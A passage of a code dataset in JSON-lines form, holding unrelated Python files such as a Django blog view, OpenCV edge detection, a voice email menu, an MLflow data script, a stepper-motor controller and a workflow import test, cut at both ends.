Paginator((Post.objects.all().order_by('-date')), 10)\n 
categories = Category.objects.all() \n\n recent = Post.objects.all().order_by('-date')[:5]\n\n try:\n posts = post_list.page(page)\n except PageNotAnInteger:\n posts = post_list.page(1)\n except EmptyPage:\n posts = post_list.page(list.num_pages)\n \n context = {'title': title, 'metadesc': metadesc, 'posts': posts, 'categories': categories,'search_form': search_form, 'recent': recent,}\n template = 'blog/index.html'\n return render(request, template, context)\n\ndef show(request, post_id, slug):\n post = get_object_or_404(Post, pk=post_id)\n\n title = post.title\n metadesc = re.sub(\"<.*?>\", \"\", post.summary).strip()\n\n categories = Category.objects.all() \n tags = Tag.objects.all()\n\n recent = Post.objects.all().order_by('-date')[:5]\n search_form = SearchForm(request.POST or None)\n\n context = {'post': post, 'title': title, 'metadesc': metadesc, 'search_form': search_form, 'categories': categories, 'recent': recent,}\n template = 'blog/post.html'\n return render(request, template, context)\n","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"584816298","text":"import cv2 as cv\nimport numpy as np\nimport math\nimport time\nimport os\n\npath= '/home/cheeze/PycharmProjects/KJW/research/defect_inspection/techwing/1. Training'\nsource_path = '/home/cheeze/PycharmProjects/KJW/research/defect_inspection/techwing/hough_transform_test'\nfor i in range(1,11):\n image_path = path + '/Translate_image%d.bmp'%i\n origin_img = cv.imread(image_path)\n cv.normalize(origin_img, origin_img, 0, 255, cv.NORM_MINMAX)\n gray = cv.cvtColor(origin_img, cv.COLOR_BGR2GRAY)\n edges = cv.Canny(gray, 70,90)\n lines = cv.HoughLinesP(edges, 1, np.pi/180, 100, minLineLength=70, maxLineGap=10)\n #lines = cv.HoughLines(edges, 1, np.pi/180, 500)\n\n # First method\n for line in lines:\n x1, y1, x2, y2 = line[0]\n cv.line(origin_img, (x1,y1),(x2,y2),(0,255,0),2)\n\n ''' \n # Second method\n for line in lines:\n rho, theta = line[0]\n a = np.cos(theta)\n b = np.sin(theta)\n x0 = a * rho\n y0 = b * rho\n x1 = int(x0 + 1000 * (-b))\n y1 = int(y0 + 1000 * (a))\n x2 = int(x0 - 1000 * (-b))\n y2 = int(y0 - 1000 * (a))\n cv.line(origin_img,(x1,y1),(x2,y2),(0,0,255),2)\n '''\n save_image_path = source_path + '/hough_transform_test_%d'%i\n cv.imwrite('transform_%d.jpg'%i, origin_img)\n cv.imwrite('canny_%d.jpg'%i, edges)\n cv.destroyAllWindows()\n #cv.imshow(\"canny\", edges)\n #cv.imshow(\"result\", origin_img)\n #k = cv.waitKey()\n #if k == 27:\n # cv.destroyAllWindows()\n #elif k == ord('s'):\n # cv.imwrite('transform_%d'%i, origin_img)\n # cv.imwrite('canny_%d'%i, edges)\n # cv.destroyAllWindows()\n #cv.imwrite('hough_transform_test_%d.jpg'%i, origin_img)\n\n\nimage_path2 = '/home/cheeze/PycharmProjects/KJW/research/defect_inspection/techwing/sample_canny.jpg'\ntest_img = cv.imread(image_path2)\ncv.normalize(test_img, test_img, 0, 255, cv.NORM_MINMAX)\ngray = cv.cvtColor(test_img, cv.COLOR_BGR2GRAY)\nedges = cv.Canny(gray, 70,90)\n#lines = cv.HoughLinesP(edges, 1, np.pi/180, 100, minLineLength=5, maxLineGap=10)\nlines = cv.HoughLines(edges, 1, np.pi/180, 190)\ntest_img = test_img - 200\n'''\nfor line in lines:\n x1, y1, x2, y2 = line[0]\n cv.line(test_img, (x1, y1), (x2, y2), (0, 255, 0), 2)\n'''\n\nfor line in lines:\n rho, theta = line[0]\n a = np.cos(theta)\n b = np.sin(theta)\n x0 = a * rho\n y0 = b * rho\n x1 = int(x0 + 1000 * (-b))\n y1 = int(y0 + 1000 * (a))\n x2 = int(x0 
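`cv2.HoughLines` returns each line as a `(rho, theta)` pair: `rho` is the perpendicular distance from the image origin and `theta` the angle of that perpendicular. The commented-out branch above converts each pair to two drawable endpoints by stepping ±1000 px along the line direction `(-sin θ, cos θ)`. The same math as a tiny self-contained check:

```python
import numpy as np

def polar_to_segment(rho: float, theta: float, length: int = 1000):
    # (a, b) is the unit normal of the line; (x0, y0) is the foot of the
    # perpendicular from the origin. Stepping along (-b, a) stays on the line.
    a, b = np.cos(theta), np.sin(theta)
    x0, y0 = a * rho, b * rho
    p1 = (int(x0 - length * b), int(y0 + length * a))
    p2 = (int(x0 + length * b), int(y0 - length * a))
    return p1, p2

# A vertical line x = 50 has rho = 50, theta = 0: both endpoints keep x == 50.
p1, p2 = polar_to_segment(50, 0.0)
assert p1[0] == p2[0] == 50
```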
- 1000 * (-b))\n y2 = int(y0 - 1000 * (a))\n cv.line(test_img,(x1,y1),(x2,y2),(0,0,255),2)\n\n\ncv.imshow(\"sobel\", test_img)\ncv.waitKey()\ncv.destroyAllWindows()","sub_path":"2. research/2. Defect_inspection/device_edge_detection.py","file_name":"device_edge_detection.py","file_ext":"py","file_size_in_byte":2654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"360744712","text":"import speech_recognition as sr\r\nimport smtplib\r\n# import pyaudio\r\n# import platform\r\n# import sys\r\nfrom bs4 import BeautifulSoup\r\nimport email\r\nimport imaplib\r\nfrom gtts import gTTS\r\nimport pyglet\r\nimport os\r\nfrom imap_tools import MailBox, Q\r\nfrom playsound import playsound\r\nimport sendMail as sMail\r\nimport readMail as rMail\r\nimport random\r\n\r\ndef process(uname):\r\n\t#choices\r\n\tprint (\"1. composed a mail.\")\r\n\ttts = gTTS(text=\"option 1. composed a mail.\", lang='en')\r\n\tran=random.randint(0,999)\r\n\r\n\tttsname=(\"hello\"+str(ran)+\".mp3\") \r\n\ttts.save(ttsname)\r\n\r\n\tplaysound(ttsname)\r\n\tos.remove(ttsname)\r\n\r\n\tprint (\"2. Check your inbox\")\r\n\ttts = gTTS(text=\"option 2. Check your inbox\", lang='en')\r\n\tran=random.randint(0,999)\r\n\r\n\tttsname=(\"hello1\"+str(ran)+\".mp3\")\r\n\ttts.save(ttsname)\r\n\r\n\tplaysound(ttsname)\r\n\tos.remove(ttsname)\r\n\r\n\tprint (\"3. Exit\")\r\n\ttts = gTTS(text=\"option 3. Exit\", lang='en')\r\n\tran=random.randint(0,999)\r\n\r\n\tttsname=(\"hello1\"+str(ran)+\".mp3\")\r\n\ttts.save(ttsname)\r\n\r\n\tplaysound(ttsname)\r\n\tos.remove(ttsname)\r\n\r\n\r\n\t#this is for input choices\r\n\ttts = gTTS(text=\"Your choice \", lang='en')\r\n\tran=random.randint(0,999)\r\n\r\n\tttsname=(\"hello2\"+str(ran)+\".mp3\") \r\n\ttts.save(ttsname)\r\n\r\n\tplaysound(ttsname)\r\n\tos.remove(ttsname)\r\n\t\r\n\ttext=\"\"\r\n\twhile(text==\"\"):\r\n\t\t#voice recognition part\r\n\t\tr = sr.Recognizer()\r\n\t\tm = sr.Microphone()\r\n\t\t\t#set threhold level\r\n\t\twith m as source: r.adjust_for_ambient_noise(source)#recognize\r\n\t\twith sr.Microphone() as source:\r\n\t\t\tprint (\"Your choice:\")\r\n\t\t\taudio=r.listen(source)\r\n\t\t\tprint (\"ok done!!\")\r\n\r\n\t\ttry:\r\n\t\t\ttext=r.recognize_google(audio)\r\n\t\t\tprint (\"You said : \"+text)\r\n\t\r\n\t\texcept sr.UnknownValueError:\r\n\t\t\tprint(\"Google Speech Recognition could not understand audio.\")\r\n\t\t \r\n\t\texcept sr.RequestError as e:\r\n\t\t\tprint(\"Could not request results from Google Speech Recognition service; {0}\".format(e)) \r\n\r\n\t\tif text==\"\":\r\n\t\t\ttts = gTTS(text=\"Error in Message.Please Give Input Again \", lang='en')\r\n\t\t\tran=random.randint(0,999)\r\n\t\t\tttsname=(\"err\"+str(ran)+\".mp3\") \r\n\t\t\ttts.save(ttsname)\r\n\t\t\tplaysound(ttsname)\r\n\t\t\tos.remove(ttsname)\r\n\r\n\r\n\t#choices details\r\n\tif text == '1' or text == 'One' or text == 'one':\r\n\t\tprint(\"Choice one\")\r\n\t\tsMail.process(uname)\t\r\n\tif text == '2' or text == 'tu' or text == 'two' or text == 'Tu' or text == 'to' or text == 'To' or text == 'do' or text == 'Do' :\r\n\t\tprint(\"Choice two\")\r\n\t\trMail.process(uname)\r\n\tif text == '3' or text == 'th' or text == 'thr' or text == 'Th' or text == 'thre' or text == 'Three' :\r\n\t\tprint(\"Choice three\")\r\n\t\texit()\t","sub_path":"Start.py","file_name":"Start.py","file_ext":"py","file_size_in_byte":2522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"96609679","text":"# # def 
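Start.py above repeats the same synthesize/save/play/delete block for every spoken prompt. A hedged helper collapsing the repetition into one function, using only the libraries the file already imports; the random-suffix temp-file scheme mirrors the original's:

```python
import os
import random
from gtts import gTTS
from playsound import playsound

def speak(text: str, lang: str = 'en') -> None:
    """Synthesize `text`, play it, then remove the temp file.

    Collapses the repeated gTTS/playsound/os.remove block in Start.py;
    the random-suffix filename scheme is the original's.
    """
    fname = 'tts_{}.mp3'.format(random.randint(0, 999))
    gTTS(text=text, lang=lang).save(fname)
    try:
        playsound(fname)
    finally:
        os.remove(fname)  # clean up even if playback raises

speak('option 1. compose a mail.')
```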
cetakBiodata(nama,umur,kota):\n# # print(f\"umur : {umur}\")\n# # print(f\"nama : {nama}\")\n# # print(f\"kota : {kota}\")\n\n# # cetakBiodata('Budi','13','Jakarta')\n\n# # Dictionary\n# def cetak(nama,twitter,**data_tambahan):\n# print(f\"nama : {nama}\")\n# print(f\"twitter : {twitter}\")\n# # print(data_tambahan['email'])\n# for x in data_tambahan:\n\n# print(f\"{x} : {data_tambahan[x]}\")\n\n# cetak(\"Silvy\",\"@silvy\",email=\"silvy@mail.com\",facebook=\"silvia.facebook\",telp=\"1234\")\n\n#\n# def sebuah_fungsi(sebuah_list):\n# sebuah_list = ['1','2','4']\n# print (sebuah_list)\n\n# ini_list = ['aaa','bbb']\n\n# sebuah_fungsi(ini_list)\n\ndef sebuahFungsiLain(sebuahList):\n sebuahList.append([10,20,30])\n print(sebuahList)\n\nsebuahList = [100,200,300]\n\nsebuahFungsiLain(sebuahList)\n\n\n\n","sub_path":"II/9_argument.py","file_name":"9_argument.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"89314048","text":"#input Program\n\ncodeP1, numberP1, priceP1 = input().split() #tipedata masih string\ncodeP1, numberP1, priceP1 = int(codeP1), int(numberP1), float(priceP1)\n\ncodeP2, numberP2, priceP2 = input().split() #tipedata masih string\ncodeP2, numberP2, priceP2 = int(codeP2), int(numberP2), float(priceP2)\n\n#proses Program\n\nresult = (numberP1*priceP1)+(numberP2*priceP2)\n\n#output Program\n\nprint(\"VALOR A PAGAR: R$ %.2f\" % (result))","sub_path":"School/000-URIONLINE/1010.py","file_name":"1010.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"32666837","text":"import logging\nimport os.path\n\nfrom datetime import datetime\nfrom lib.ArgumentParser import createparser\nfrom lib.Monitor import Monitor\n\n\ndef setup_logging(args):\n '''\n this function sets up the logging for the entire application\n '''\n logs_path = os.path.abspath('./logs')\n if not os.path.exists(logs_path):\n os.mkdir(logs_path)\n\n logger = logging.getLogger('catmonitor')\n logger.setLevel(logging.DEBUG)\n log_file = os.path.join(logs_path, datetime.now().strftime(\"%Y-%m-%d_%H.%M.%S\") + \".log\")\n\n fh = logging.FileHandler(log_file)\n fh.setLevel(logging.DEBUG)\n\n ch = logging.StreamHandler()\n\n if args.verbose:\n ch.setLevel(logging.DEBUG)\n else:\n ch.setLevel(logging.INFO)\n\n formatter = logging.Formatter('[%(asctime)s][%(levelname)s][%(filename)s]\\t%(message)s')\n fh.setFormatter(formatter)\n ch.setFormatter(formatter)\n\n logger.addHandler(fh)\n logger.addHandler(ch)\n\n return logger\n\n\nif __name__ == \"__main__\":\n args = createparser()\n setup_logging(args)\n\n monitor = Monitor(args)\n exit(monitor.start())\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"593766314","text":"import mlflow\nimport click\nimport logging\nimport pandas as pd\nimport numpy as np\nimport sklearn\n\nfrom sklearn.model_selection import train_test_split\n\nrandom_state = 42\nnp.random.seed(random_state)\n\n@click.command(help=\"Gather an input data set\")\n@click.option(\"--raw_dataset\", help=\"raw file data set\",\n default='./leaf.csv', type=str)\n@click.option(\"--noise\", help=\"Noise in testing\",\n default=0.003, type=float)\ndef gathering(raw_dataset, noise):\n with mlflow.start_run(run_name='gathering') as mlrun:\n\n # Your gathering code\n# file = 
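The argument demo above is making a specific point: the commented-out `sebuah_fungsi` rebinds its parameter to a new list (the caller's list is untouched), while `sebuahFungsiLain` mutates the shared list in place via `append`. A compact contrast of the two behaviours, since that distinction is the whole lesson of the file:

```python
def rebind(seq):
    seq = ['1', '2', '4']      # rebinding: only the local name changes
    return seq

def mutate(seq):
    seq.append([10, 20, 30])   # mutation: the caller's object changes

outer = [100, 200, 300]
rebind(outer)
assert outer == [100, 200, 300]                 # unchanged by rebinding
mutate(outer)
assert outer == [100, 200, 300, [10, 20, 30]]   # changed in place
```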
'/home/guess/Desktop/autodeploy/examples/demo3/data-science/workflow/leaf.csv'\n names = ['species', 'specimen_number', 'eccentricity', 'aspect_ratio',\n 'elongation', 'solidity', 'stochastic_convexity', 'isoperimetric_factor',\n 'maximal_indentation_depth', 'lobedness', 'average_intensity',\n 'average_contrast', 'smoothness', 'third_moment', 'uniformity', 'entropy']\n\n df = pd.read_csv(raw_dataset, names=names)\n\n df_cleaned = df.loc[:, df.columns != 'specimen_number'].copy()\n df_cleaned[df_cleaned.columns] = df_cleaned[df_cleaned.columns].astype(float)\n df_cleaned['species'] = df_cleaned['species'].astype(int)\n\n test_size = 0.20\n\n training, testing = train_test_split(\n df_cleaned, test_size=test_size, random_state=random_state)\n\n print('Testing', testing.shape)\n testing_noise = testing.copy()\n \n testing_part = testing.loc[:, testing.columns != 'species'].sample(frac=0.5)\n noise = np.random.normal(0, noise, [len(testing_part),len(testing_part.columns)])\n df_noise = testing_part + noise\n\n testing_noise.loc[:, testing_noise.columns != 'species'] = df_noise\n\n testing_noise = testing_noise.dropna()\n\n new_testing = pd.concat([testing, testing_noise])\n print('New testing', new_testing.shape)\n\n training_noise = pd.concat([training, testing_noise.sample(10)])\n print('new_training', training_noise.shape) \n \n mlflow.log_param(key='n_rows_raw', value=len(df))\n print(df.head())\n\n training.to_csv('training.csv', index=False)\n training_noise.to_csv('training_noise.csv', index=False)\n new_testing.to_csv('testing.csv', index=False)\n testing_noise.to_csv('testing_noise.csv', index=False)\n \n mlflow.log_artifact('training.csv')\n mlflow.log_artifact('training_noise.csv')\n mlflow.log_artifact('testing.csv')\n mlflow.log_artifact('testing_noise.csv')\n \n\nif __name__ == '__main__':\n gathering()\n","sub_path":"examples/demo3/data-science/workflow/.ipynb_checkpoints/gathering-checkpoint.py","file_name":"gathering-checkpoint.py","file_ext":"py","file_size_in_byte":2686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"380694930","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Users/Dani/Documents/Projects/Golismero_2.0/src_github/tools/sqlmap/lib/core/profiling.py\n# Compiled at: 2013-12-09 06:41:17\n\"\"\"\nCopyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)\nSee the file 'doc/COPYING' for copying permission\n\"\"\"\nimport codecs, os, cProfile\nfrom lib.core.common import getUnicode\nfrom lib.core.data import logger\nfrom lib.core.data import paths\nfrom lib.core.settings import UNICODE_ENCODING\n\ndef profile(profileOutputFile=None, dotOutputFile=None, imageOutputFile=None):\n \"\"\"\n This will run the program and present profiling data in a nice looking graph\n \"\"\"\n try:\n from thirdparty.gprof2dot import gprof2dot\n from thirdparty.xdot import xdot\n import gobject, gtk, pydot\n except ImportError as e:\n errMsg = 'profiling requires third-party libraries (%s). 
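The gathering step above builds its noisy test split by adding zero-mean Gaussian noise to a sampled half of the feature rows. The core transformation isolated as a sketch; the column names are placeholders and the 0.003 sigma is the script's own default:

```python
import numpy as np
import pandas as pd

rng = np.random.RandomState(42)
df = pd.DataFrame(rng.rand(10, 3), columns=['f1', 'f2', 'f3'])  # placeholder features

# Same recipe as gathering(): perturb a sampled fraction of rows with
# zero-mean Gaussian noise at the script's default sigma of 0.003.
part = df.sample(frac=0.5, random_state=42)
noise = rng.normal(0, 0.003, part.shape)
noisy = part + noise

print((noisy - part).abs().max())  # perturbations stay on the sigma scale
```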
' % getUnicode(e, UNICODE_ENCODING)\n errMsg += 'Quick steps:%s' % os.linesep\n errMsg += '1) sudo apt-get install python-pydot python-pyparsing python-profiler graphviz'\n logger.error(errMsg)\n return\n\n if profileOutputFile is None:\n profileOutputFile = os.path.join(paths.SQLMAP_OUTPUT_PATH, 'sqlmap_profile.raw')\n if dotOutputFile is None:\n dotOutputFile = os.path.join(paths.SQLMAP_OUTPUT_PATH, 'sqlmap_profile.dot')\n if imageOutputFile is None:\n imageOutputFile = os.path.join(paths.SQLMAP_OUTPUT_PATH, 'sqlmap_profile.png')\n if os.path.exists(profileOutputFile):\n os.remove(profileOutputFile)\n if os.path.exists(dotOutputFile):\n os.remove(dotOutputFile)\n if os.path.exists(imageOutputFile):\n os.remove(imageOutputFile)\n infoMsg = 'profiling the execution into file %s' % profileOutputFile\n logger.info(infoMsg)\n cProfile.run('start()', profileOutputFile)\n infoMsg = \"converting profile data into a dot file '%s'\" % dotOutputFile\n logger.info(infoMsg)\n dotFilePointer = codecs.open(dotOutputFile, 'wt', UNICODE_ENCODING)\n parser = gprof2dot.PstatsParser(profileOutputFile)\n profile = parser.parse()\n profile.prune(0.5 / 100.0, 0.1 / 100.0)\n dot = gprof2dot.DotWriter(dotFilePointer)\n dot.graph(profile, gprof2dot.TEMPERATURE_COLORMAP)\n dotFilePointer.close()\n infoMsg = \"converting dot file into a graph image '%s'\" % imageOutputFile\n logger.info(infoMsg)\n pydotGraph = pydot.graph_from_dot_file(dotOutputFile)\n pydotGraph.write_png(imageOutputFile)\n infoMsg = 'displaying interactive graph with xdot library'\n logger.info(infoMsg)\n win = xdot.DotWindow()\n win.connect('destroy', gtk.main_quit)\n win.set_filter('dot')\n win.open_file(dotOutputFile)\n gobject.timeout_add(1000, win.update, dotOutputFile)\n gtk.main()\n return","sub_path":"pycfiles/golismero-2.0.3-1.tar/profiling.py","file_name":"profiling.py","file_ext":"py","file_size_in_byte":2878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"532682762","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('articulos', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Compra',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('fecha', models.DateField(auto_now_add=True)),\n ('hora', models.TimeField(auto_now_add=True)),\n ('numero_factura', models.IntegerField()),\n ('scaneo', models.ImageField(blank=True, null=True, upload_to='imagen_comprobantes')),\n ],\n options={\n 'verbose_name': 'Compra',\n 'verbose_name_plural': 'Compras',\n },\n ),\n migrations.CreateModel(\n name='DetalleCompra',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('cantidad', models.IntegerField(default=1)),\n ('articulo', models.ForeignKey(to='articulos.Articulo')),\n ('compra', models.ForeignKey(to='compras.Compra')),\n ],\n options={\n 'verbose_name': 'Detalle de Compra',\n 'verbose_name_plural': 'Detalles de Compras',\n },\n ),\n ]\n","sub_path":"apps/compras/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"526497273","text":"\nimport os.path\n\nImport(\"env\")\n\n\n# SOURCES\n\nvectorsources = [\n\n\t]\n\nvectorheaders = [\n\n\t'types.h', 
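The sqlmap helper above renders cProfile output as a call graph via gprof2dot/xdot/pydot and bails out when those third-party pieces are missing. When they are unavailable, the standard library alone already gives a usable text view of the same raw stats file; a minimal sketch:

```python
import cProfile
import pstats

def work():
    return sum(i * i for i in range(100_000))

# Profile into a raw stats file, as the helper above does with 'start()'.
cProfile.run('work()', 'profile.raw')

# Pure-stdlib fallback when gprof2dot/xdot/pydot are unavailable:
stats = pstats.Stats('profile.raw')
stats.sort_stats('cumulative').print_stats(10)  # top 10 by cumulative time
```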
'vector.h'\n\n\t]\n\n\n# ADD INTERNAL FLAGS\n\nlibenv = env.Clone()\nlibenv.Append( CPPDEFINES=['VECTOR_COMPILE=1'] )\n\n\n# OUTPUTS\n\nenv['vectorlib'] = libenv.StaticLibrary( 'vector', vectorsources )\n\n\n# DEPENDENCIES\n\n#if env['toolset'] == 'gnu':\n#\tlibenv.Depends( [ os.path.splitext( x )[0] + '.o' for x in vectorsources ], '#/vector/vector.h.gch' )\n\n\n# INSTALLS\n\nlibenv.AddPostAction( 'vector', libenv.Install( '#lib/${platform}${platformsuffix}/${buildprofile}', [ env['vectorlib'] ] ) )\n","sub_path":"vector/SConscript","file_name":"SConscript","file_ext":"","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"396379410","text":"\nfrom TMCL import *\n\nclass StepRocker(object):\n def __init__(self, N0, N1=None, N2=None, port=\"COM3\", debug=False):\n self._N0 = int(N0)\n self._N1 = None if (N1 is None) else int(N1)\n self._N2 = None if (N2 is None) else int(N2)\n self.TMCL = TMCL.TMCLDevice(port, debug)\n\n @property\n def N0(self):\n return self._N0\n\n @property\n def N1(self):\n if self._N1 is None:\n raise RuntimeError('Please set number of steps for this Motor')\n return self._N1\n\n @property\n def N2(self):\n if self._N2 is None:\n raise RuntimeError('Please set number of steps for this Motor')\n return self._N2\n\n def set_motor_steps(self, N0=None, N1=None, N2=None):\n if not (N0 is None):\n self._N0 = int(N0)\n if not (N1 is None):\n self._N1 = int(N1)\n if not (N2 is None):\n self._N2 = int(N2)\n\n def get_globals(self):\n ret = {}\n for key, value in TMCL.GLOBAL_PARAMETER.iteritems():\n #print \"GGP:\",key+value\n bank, par, name, _, _ = key+value\n ret[name] = self.TMCL.ggp(bank, par)\n return ret\n\n def get_parameters(self):\n retmotor = [{}, {}, {}]\n retsingle = {}\n for mn in range(3):\n for key, value in TMCL.AXIS_PARAMETER.iteritems():\n par, name, _, _ = (key,)+value\n #print \"GAP:\", mn, (key,)+value\n if par not in TMCL.SINGLE_AXIS_PARAMETERS:\n retmotor[mn][name] = self.TMCL.gap(mn, par)\n elif mn == 0:\n retsingle[name] = self.TMCL.gap(mn, par)\n return retmotor, retsingle\n\n def set_important_parameters(self, maxspeed=1000, maxaccel=1000,\n maxcurrent=470, standbycurrent=117,\n microstep_resolution=6,store=False):\n self.TMCL.sap(0, 140, int(microstep_resolution))\n for mn in range(3):\n self.TMCL.sap(mn, 4, int(maxspeed))\n self.TMCL.sap(mn, 5, int(maxaccel))\n self.TMCL.sap(mn, 6, int(maxcurrent))\n self.TMCL.sap(mn, 7, int(standbycurrent))\n if not bool(store):\n return\n self.TMCL.stap(0, 140)\n for mn in range(3):\n self.TMCL.stap(mn, 4)\n self.TMCL.stap(mn, 5)\n self.TMCL.stap(mn, 6)\n self.TMCL.stap(mn, 7)\n\n def rotate(self, frequency, motor=0, direction='cw'):\n microstep_resolution = self.TMCL.gap(0, 140)\n vel = int(frequency * self.N0 * microstep_resolution)\n mn = int(motor)\n if str(direction) == 'cw':\n self.TMCL.ror(mn, vel)\n elif str(direction) == 'ccw':\n self.TMCL.rol(mn, vel)\n else:\n raise ValueError('direction needs to be either \"cw\" or \"ccw\"')\n return vel / float( self.N0 * microstep_resolution )\n\n\n def stop(self, motor=0):\n mn = int(motor)\n self.TMCL.mst(mn)\n\n\nif __name__ == \"__main__\":\n\n import time\n\n #rocker = StepRocker(200, port='COM3')\n stepper = TMCLDevice(\"COM3\")\n stepper.sap(0,4,500) #set the speed\n stepper.mvp(0,\"REL\",-12800) #turn 1 revolution ccw\n #time.sleep(1)\n 
#rocker.stop()\n","sub_path":"TMCM.py","file_name":"TMCM.py","file_ext":"py","file_size_in_byte":3260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"251820884","text":"# Copyright (C) 2020 Google Inc.\n# Licensed under http://www.apache.org/licenses/LICENSE-2.0 \n\n\"\"\"Tests for workflow specific imports.\"\"\"\n\nfrom datetime import date\nimport collections\n\nimport ddt\nimport freezegun\n\nfrom integration.ggrc import TestCase\nfrom integration.ggrc_workflows import generator as wf_generator\nfrom integration.ggrc_workflows.models import factories as wf_factories\nfrom integration.ggrc.models import factories\n\nfrom ggrc import db\nfrom ggrc.converters import errors\nfrom ggrc.models.objective import Objective\nfrom ggrc_workflows.models.task_group import TaskGroup\nfrom ggrc_workflows.models.task_group_task import TaskGroupTask\nfrom ggrc_workflows.models.workflow import Workflow\n\n\n@ddt.ddt\nclass TestWorkflowObjectsImport(TestCase):\n \"\"\"Test imports for basic workflow objects.\"\"\"\n\n def setUp(self):\n super(TestWorkflowObjectsImport, self).setUp()\n self.generator = wf_generator.WorkflowsGenerator()\n\n def test_full_good_import(self):\n \"\"\"Test full good import without any warnings.\"\"\"\n user_data = [\n collections.OrderedDict([\n (\"object_type\", \"Person\"),\n (\"name\", \"TestUser\"),\n (\"email\", \"testuser@example.com\"),\n ]),\n ]\n response = self.import_data(*user_data)\n\n objective_data = [\n collections.OrderedDict([\n (\"object_type\", \"objective\"),\n (\"Code*\", \"\"),\n (\"title\", \"obj-1\"),\n (\"admin\", \"testuser@example.com\"),\n ]),\n collections.OrderedDict([\n (\"object_type\", \"objective\"),\n (\"Code*\", \"\"),\n (\"title\", \"obj-2\"),\n (\"admin\", \"testuser@example.com\"),\n ]),\n ]\n response += self.import_data(*objective_data)\n\n workflow_data = [\n collections.OrderedDict([\n (\"object_type\", \"Workflow\"),\n (\"code\", \"\"),\n (\"title\", \"wf-1\"),\n (\"Need Verification\", True),\n (\"force real-time email updates\", \"no\"),\n (\"Admin\", \"testuser@example.com\"),\n ]),\n ]\n response += self.import_data(*workflow_data)\n\n workflow = Workflow.query.filter_by(title=\"wf-1\").first()\n objective = Objective.query.filter_by(title=\"obj-1\").first()\n task_group_data = [\n collections.OrderedDict([\n (\"object_type\", \"TaskGroup\"),\n (\"code\", \"\"),\n (\"title\", \"tg-1\"),\n (\"workflow\", workflow.slug),\n (\"Assignee\", \"testuser@example.com\"),\n (\"map:objective\", objective.slug)\n ]),\n ]\n response += self.import_data(*task_group_data)\n\n task_group = TaskGroup.query.filter_by(title=\"tg-1\").first()\n tgt_data_block = [\n collections.OrderedDict([\n (\"object_type\", \"Task Group Task\"),\n (\"code\", \"\"),\n (\"task title\", \"task-1\"),\n (\"task type\", \"Rich Text\"),\n (\"task group code\", task_group.slug),\n (\"task start date\", date(2015, 7, 1)),\n (\"task due date\", date(2015, 7, 15)),\n (\"task assignees\", \"testuser@example.com\"),\n ]),\n collections.OrderedDict([\n (\"object_type\", \"Task Group Task\"),\n (\"code\", \"\"),\n (\"task title\", \"task-2\"),\n (\"task type\", \"Rich Text\"),\n (\"task group code\", task_group.slug),\n (\"task start date\", date(2015, 7, 10)),\n (\"task due date\", date(2016, 12, 30)),\n (\"task assignees\", \"testuser@example.com\"),\n ]),\n collections.OrderedDict([\n (\"object_type\", \"Task Group Task\"),\n (\"code\", \"\"),\n (\"task title\", \"task-3\"),\n (\"task type\", \"Checkboxes\"),\n (\"task 
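`StepRocker.rotate` above converts a shaft frequency (rev/s) into a TMCL velocity by multiplying by fullsteps-per-revolution and the microstep value read from axis parameter 140. A caveat worth flagging: on many TMCM firmwares parameter 140 stores the microstep resolution as an exponent (a stored 6 means 2^6 = 64 microsteps), so the direct multiplication above may under-scale; the worked arithmetic below takes the true multiplier and matches the demo's `mvp(0, "REL", -12800)` "one revolution" call:

```python
def tmcl_velocity(freq_hz: float, fullsteps_per_rev: int, microstep: int) -> int:
    # rev/s * fullsteps/rev * microsteps/fullstep = microsteps/s
    return int(freq_hz * fullsteps_per_rev * microstep)

# 1 rev/s on a 200-step motor at 64 microsteps -> 12800 microsteps/s,
# consistent with mvp(0, "REL", -12800) turning one revolution above.
assert tmcl_velocity(1.0, 200, 64) == 12800
```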
